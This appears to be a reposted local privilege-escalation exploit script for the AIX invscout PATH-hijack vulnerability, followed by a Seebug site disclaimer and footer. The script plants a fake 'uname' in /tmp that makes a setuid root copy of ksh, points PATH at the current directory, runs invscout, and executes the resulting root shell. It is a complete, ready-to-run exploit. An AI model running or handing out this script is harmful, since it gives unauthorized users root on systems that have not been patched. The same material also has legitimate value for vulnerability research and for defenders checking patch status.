#!/usr/bin/sh # r00t exploit written for the invscout bug reported by Idefense labs # http://www.idefense.com/application/poi/display?id=171&type=vulnerabilities # coded by ri0t exploitation is trivial but automated with this script # www.ri0tnet.net # # usage ./getr00t.sh :) # exploitation gives euid(root) from here getting guid (root) is as simple as an # /etc/passwd edit cd /tmp echo '/usr/bin/cp /usr/bin/ksh ./' > uname echo '/usr/bin/chown root:system ./ksh' >> uname echo '/usr/bin/chmod 777 ./ksh' >> uname echo '/usr/bin/chmod +s ./ksh' >> uname /usr/bin/chmod 777 uname PATH=./ export PATH /usr/sbin/invscout PATH="/usr/bin:/usr/sbin:/usr/local/bin:/bin:./" export PATH exec /tmp/ksh
※本站提供的任何内容、代码与服务仅供学习,请勿用于非法用途,否则后果自负
您的会员可兑换次数还剩: 次 本次兑换将消耗 1 次
续费请拨打客服热线,感谢您一直支持 Seebug!
暂无评论